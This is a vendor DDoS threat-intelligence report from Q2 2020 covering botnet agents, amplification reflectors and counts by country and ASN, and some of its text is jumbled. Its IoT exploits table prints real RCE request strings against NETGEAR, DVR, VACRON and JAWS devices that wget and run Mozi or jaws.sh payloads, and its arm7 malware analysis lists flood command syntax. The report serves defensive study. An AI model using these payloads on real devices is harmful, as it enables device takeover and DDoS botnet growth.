The State of DDoS Weapons

THE STATE OF DDOS WEAPONS REPORT A10 Networks | 1

The State of DDoS WeaponsA Threat Intelligence Report By A10 Networks Security Research

Q2 2020

DDOS THREAT ADVISORY REPORT A10 Networks | 2

DDoS attacks continue to grow in frequency, intensity, and sophistication. However, the delivery method of using infected botnets and vulnerable servers to perform crushing attacks on a massive scale has not changed. Unlike other cyber attacks, where attackers leverage obfuscation to prevent detection, the loud distributed nature of DDoS attacks creates opportunities for defenders to take a proactive approach by focusing on the weapon’s location.

Reflected Amplification Weapons

Attackers leverage vulnerabilities in the UDP protocol to spoof the target’s IP address and exploit vulnerabilities in servers that initiate a reflected response. This strategy amplifies the attack by producing server responses that are much larger than the initial requests.

DDoS Botnet Weapons

Attackers leverage malware-infected computers, servers, and IoT devices that are under the control of a bot herder. The resulting botnet is used to initiate stateful and stateless volumetric, network, and application-layer attacks.


Executive Summary

DDoS Weapons Tracked By A10 Networks:

Key Insights from this Report

• Portmap is the largest reflected amplification protocol seen this quarter.

• Even though SSDP and TFTP are close behind in size, they are far more dangerous in terms of their amplification factor and mitigation difficulty/complexity.

• With the addition of portmap to the report, the U.S. has taken the lead in terms of hosting the number of potential amplification weapons while China continues to top the list of active bots or drones.

• Exploits that surfaced in late 2019 are now being weaponized, as seen in the Malware Propagation and Drone Recruitment section of this report.

Approximately 10 Million Unique Source Addresses


Identify and Enumerate the Origin of DDoS Weapons

Threat researchers gather weapons intelligence by closely monitoring attack

agents under the control of botnet command and control (C2), discovering

malware innovations through deploying honeypots, and scanning the internet for

exposed reflected amplification sources.

A10 Networks accumulates millions of IP addresses of exploited hosts regularly

used in DDoS attacks. This data is used to create voluminous feeds that include

millions of entries. A10 solutions have the capacity to consume these entries and

facilitate the implementation of surgical security and mitigation policies.

DDoS Weapons Intelligence

A10 Networks | 3

It’s impossible to fully understand

the motivation or timing of all

DDoS attacks. However, having

an inventory of the weapons and

compromised networks is possible.

A10 Networks’ DDoS weapons

intelligence provides defenders key

data to improve their DDoS

situational awareness, allowing them

to proactively defend themselves

even before the attacks starts.”

—Rich Groves,

Director of Security Research,

A10 Networks

Portmap: 1,818,848

SNMP: 1,673,070

SSDP: 1,671,128

DNS Resolver : 1,331,160

TFTP: 1,054,330

Top Tracked DDoS Weapons by Size


Top Sources of DDoS Weaponry

Top Countries Hosting DDoS Weapons

DDoS weapons are globally distributed with higher concentrations

found where internet-connected populations are most dense.An ASN is a collection of IP address ranges that are under the

control of a single administrative operator. These companies

or government operators allow large numbers of weapons

belonging to their users to remain connected to their network

and attack other systems.

Although the nature of DDoS attacks is distributed, we have found valuable insights from where they originate.

United States 1,591,719

China 1,388,531

Korea 776,327

Russia 696,186

India 283,960

Top ASN Hosting DDoS Weapons

China Telecom 567,911

Charter Communications 477,926

Korea Telecom 366,714

China Unicom CN 356,649

Chungwha Telecom 167,732

DDoS Botnet Agents Compute nodes like computers, servers, routers, cameras, and other IoT devices infected by malware an

under the control of a malicious actor are the prized tools for motivated DDoS attackers. These weapons,

commonly referred to as bots or botnets, provide the ultimate flexibility to DDoS attackers.

Security researchers accumulate knowledge of repeatedly used hosts in DDoS attacks and scan for hosts

exhibiting malware-infected characteristics. These IP addresses deserve further scrutiny and should be

treated suspiciously while under a DDoS attack.


Top Countries Hosting DDoS Botnet Agents

1. China 15%

2. Vietnam 12%

3. Taiwan 9%

4. Greece 4%

5. Other 60%

Chungwha Telecom (Taiwan)

China Telecom

China Unicom CN

VNPT Corp (Vietnam)

Telecom Egypt

Top ASNS Hosting DDoS Botnet Agents


Malware Propagation and Drone Recruitment IoT devices tend to be systems that the user installs and then forgets about. In many cases, this means that when security

updates and bug fixes are required, the user either does not know or care about it.

With this in mind, the most common way in which bad actors target these devices is through a collection of remote code

execution (RCE) exploits and an ever growing list of default user names and passwords from device vendors, in an effort to

constantly increase the size and attack strength of their DDoS attacks. However, for this approach to be effective, modern

malware is built in a way that newly infected bots can infect other vulnerable systems independently.

A10 Networks’ weapons intelligence system detects hundreds of thousands of such events per hour from all over the internet.

Top IoT Exploits The following table lists the

top IoT exploits detected and

recorded by A10 Networks,

the TCP ports used by these

exploits, and the sample

content within the requests

sent by these exploits for RCE

or brute-force login attacks.

Exploit Port Sample Content

Default credentials for a growing list of IoT devices with weak or documented administrator passwords

23 (Telnet)Username and password combinations starting with the original 61 from Mirai source code and new additions depending on the malware family (admin/admin, root/vizxv, etc.)

NETGEAR unauthenticated RCE 80 (HTTP)GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

RCE for many DVR systems 81

GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*

;wget${IFS}http://x.x.x.x/Mozi.a;sh

${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0

RCE for VACRON network video recorders 8080

GET /board.cgi?cmd=cd+/tmp;rm+rf+*

;wget+http://x.x.x.x/Mozi.a

;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

JAWS web server unauthenticated RCE 60001GET /shell?cd /tmp;wget http://x.x.x.x/jaws.sh -O jaws.sh;sh jaws.sh HTTP/1.1 Connection: keep-alive


Top IoT Binary Dropped by Attack Capabilities of the Most Distributed

Binary Name

arm7

Cloud.x86

mmmmh.x86

Mozi.m

Mozi.a

Malware Family

Gafgyt Family

Dark Nexus

Mirai Family

Gafgyt family

Gafgyt family

Throughout the quarter, A10 Networks’ weapons

intelligence system detected thousands of

malware binaries dropped into systems, in the

wake of the different IoT-based attacks and

exploits discussed above. The following table

lists the top binaries detected and the malware

family they belong to (based on the payload and

behavior of the binaries).

At A10 Networks, we decided to dig deeper into the characteristics and behavior of the

binary we saw the most this quarter, namely the “arm7.”

By reverse engineering and analyzing the “arm7” binary, a firm understanding of this

DDoS weapon is established, which can help in creating a more efficient and effective

mitigation strategy.

Attack Type Description

TCP floods

(Flags: SYN, RST, FIN, ACK, PSH, URG)

Arm7 is able to source a flood of TCP traffic with random payloads, as well as the collection of flags shown.

Below is a sample of the attack command and options used during attack time:

SYN <host> <port> <time> 32 <packetsize>

HTTP floods

(Methods: Get, Head, Post, Put, Delete, Trace, Option)

These HTTP attacks are equipped in the binary and dangerous not just for bandwidth exhaustion, but also for connection exhaustion attacks.

Here is a sample of the attack command used and options. Each HTTP method shown on the left utilizes a similar attack syntax:

HTTP GET <host or domain> <port> <path> <time> <conns>

UDP floodsThis is a standard UDP flood with random data padding.

UDP <host> <port> <time> 32 <packetsize>

Valve

This is a Valve Source Engine (VSE) query, which in theory, is generally used for amplification. However, it has increasingly been seen as a directed attack on an endpoint as well.

VSE <host> <port> <time> 32 <packetsize>

DNS floodThis is a flood of UDP DNS queries

DNS <host> <port> <time>

ICMPThis is a flood of ICMP “destination unreachables.”

BLACKNURSE <host> <time>

HexThis is a flood of the hex string of your choice.

HEX <host> <port> <time> <packetsize>

ARM7 Attack Toolkit Sample

Top Countries/Regions Hosting Reflected Amplification Attack Weapons

DDOS THREAT SPECIAL REPORT A10 Networks | 8

Amplified reflection attacks take the prize when it comes to size. This attack

strategy exploits the connectionless nature of the UDP protocol and spoofs the

victim’s IP address.

The attacker sends volumes of small requests with the spoofed victim’s IP

address to internet-exposed servers. The servers reply with large amplified

responses to the unwitting victim. These particular servers are targeted because

they answer to unauthenticated requests and are running applications or

protocols with amplification capabilities.

The most common types of these attacks can use millions of exposed DNS,

NTP, SSDP, SNMP, and CLDAP UDP-based services. These attacks have resulted

in record-breaking volumetric attacks, such as the recent CLDAP-based AWS

attack in Q1 2020, which peaked at 2.3 Tbps and was 70% higher than the

previous record holder, the 1.35 Tbps Memcached-based GitHub attack of 2018.

Although CLDAP does not make the top 5 list of our Amplification attack

weapons this quarter, we did record 15,651 potential CLDAP weapons. This makes

it a fraction of the top amplification attack weapon this quarter i.e. portmap,

where for every CLDAP weapon, we have 116 portmap weapons available to

attackers. The AWS attack shows that even this fractional attack surface has

the potential for generating very large scale DDoS attacks and the only way to

protect against these attacks is to proactively keep track of DDoS weapons and

potential exploits.

Country/Region Unique Sources

United States 773,544

China 190,642

Russia 78,889

France 73,135

Germany 63,358


Republic of Korea 386,810

China 238,194

Taiwan 120,240

Japan 69,474





Russia 106,820

China 64,804

Canada 42,477




India 156,880

Brazil 107,559

Italy 85,606




India 77,663

Brazil 43,972

Italy 32,233

Amplification – A Favorite for Large DDoS Attacks

PORTMAP

SSDP

TFTP

SNMP

DNS Resolvers


DDoS Weapons and Threat Intelligence Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.

Actionable DDoS weapons intelligence enables a proactive approach to DDoS defenses by creating blacklists based on current and accurate feeds of IP addresses of DDoS botnets and available vulnerable servers commonly used for DDoS attacks.

A10 Networks’ security researchers are at the forefront of DDoS weapons intelligence. A10 delivers a comprehensive and converged system to enable organizations to achieve full-spectrum DDoS protection.

To learn more about A10 Networks DDoS weapons intelligence, visit our DDoS threat map at: https://threats.a10networks.com


https://threats.a10networks.com

About A10 NetworksA10 Networks (NYSE: ATEN) provides secure application services for on-premises, multi-cloud and edge-cloud environments at hyperscale. Our mission is to enable service providers and enterprises to deliver business-critical applications that are secure, available and efficient for multi-cloud transformation and 5G readiness. We deliver better business outcomes that support investment protection, new business models and help future-proof infrastructures, empowering our customers to provide the most secure and available digital experience. Founded in 2004, A10 Networks is based in San Jose, Calif. and serves customers globally. For more information, visit www.a10networks.com and follow us @A10Networks.

Learn More ABOUT A10 NETWORKS

Contact Usa10networks.com/contact

©2020 A10 Networks, Inc. All rights reserved. A10 Networks, the A10 Networks logo, ACOS, Thunder, Lightning, Harmony and SSL Insight are trademarks or registered trademarks of A10 Networks, Inc. in the United States and other countries. All other trademarks are property of their respective owners. A10 Networks assumes no responsibility for any inaccuracies in this document. A10 Networks reserves the right to change, modify, transfer, or otherwise revise this publication without notice. For the full list of trademarks, visit: www.a10networks.com/a10-trademarks.

Part Number: A10-EB-14115-EN-05 JUN 2020

https://twitter.com/a10networks

https://www.a10networks.com/company/contact-us

Documents

The State of DDoS Weapons